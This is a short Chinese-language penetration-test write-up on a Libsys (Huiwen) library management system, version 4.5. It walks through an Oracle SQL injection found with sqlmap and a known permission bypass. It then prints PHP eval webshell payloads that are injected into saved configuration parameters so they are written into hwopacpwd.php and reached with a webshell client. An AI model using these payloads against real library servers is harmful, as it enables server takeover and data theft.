0x00 前言
對某圖書館系統一次檢測
0x01 ***
- 訪問該網站時,發現自動跳轉到/opac/search.php,且下方有公司信息,可以判定該系統爲Libsys圖書管理系統,且版本爲4.5
2.通過烏雲鏡像站的搜索,我們發現該圖書管理系統存在挺多漏洞,但本次***過程中遇到的情況與圖中的漏洞略有差異點
3.通過搜索,發現一處注入點,爲Oracle注入,使用sqlmap很快速的就檢測出
4.經過一番搗鼓後,本想常規思路通過數據庫找到後臺賬號密碼登錄,但發現後臺賬號密碼不在數據庫中,只能另闢蹊徑,發現另一篇文章http://wooyun.chamd5.org/bug_detail.php?wybug_id=wooyun-2014-085980 提到的權限繞過,但存在一些差異
5.訪問成功繞過
6.根據文章中所提到修改索引文件夾路徑中參數,因爲該參數是寫在另一個文件中,只要將該參數寫webshell,那麼就會修改該php文件中內容,只要訪問/include/hwopacpwd.php該文件即可!
利用代碼爲:
c:/hwopac/index/";@eval($_POST[131514]);//
保存後,發現訪問失敗,發現是該參數並沒有寫入文件中
7.在參考另外一篇文章https://joychou.org/web/huiwen-libsys.html 分析後
發現其實該頁面中保存的參數不僅只有路徑是會寫入,其他參數也會寫入,那麼可以考慮對其他參數進行webshell的寫入
8.構造user參數payload
該項爲高危操作,因爲寫入內容到php文件,如果因爲失誤導致語法錯誤等問題,則可能將影響服務器正常運作!查看了文章分析後,發現配置文件中的信息情況
那麼本地將語法調通,再將payload放上,確保萬無一失
xxxx";@eval($_POST[123]);//
9.保存後,再次使用菜刀連接webshell
10.連上去查看hwopacpwd.php文件後,才發現原來該文件中並沒有路徑參數,也就是沒保存該參數值進去,才導致寫入失敗